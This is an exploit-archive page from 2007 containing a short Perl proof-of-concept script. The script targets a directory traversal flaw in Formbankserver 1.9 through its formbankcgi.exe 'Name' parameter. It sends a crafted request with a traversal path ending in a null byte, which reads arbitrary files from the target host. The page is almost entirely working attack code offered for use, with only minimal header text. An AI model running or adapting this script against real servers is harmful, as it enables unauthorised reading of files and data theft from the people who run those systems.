[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Formbankserver 1.9 (Name) Directory Transversal Vulnerability
# Published : 2007-01-01
# Author : Bl0od3r
# Previous Title : Apple Quicktime <= 7.1.3 (HREFTrack) Cross-Zone Scripting Exploit
# Next Title : Apple Quicktime (rtsp URL Handler) Stack Buffer Overflow Exploit
#!perl
#found by Bl0od3r
#visit http://dc3.dl.am
#download:http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796
#developer:http://www.fersch.de/formbankserver/
use LWP::Simple;
sub usage
{
die("file.pl host.com /../file.txt");
}
$host= $ARGV[0];
$file= $ARGV[1];
if (!$host) {
die("No Host.");
} ; if (!$file) {
die("No File.");
}
getprint "http://".$host ."/cgi-bin/formbankcgi.exe/AbfrageForm?Name=".$ARGV[1]."%00";
# www.Syue.com [2007-01-01]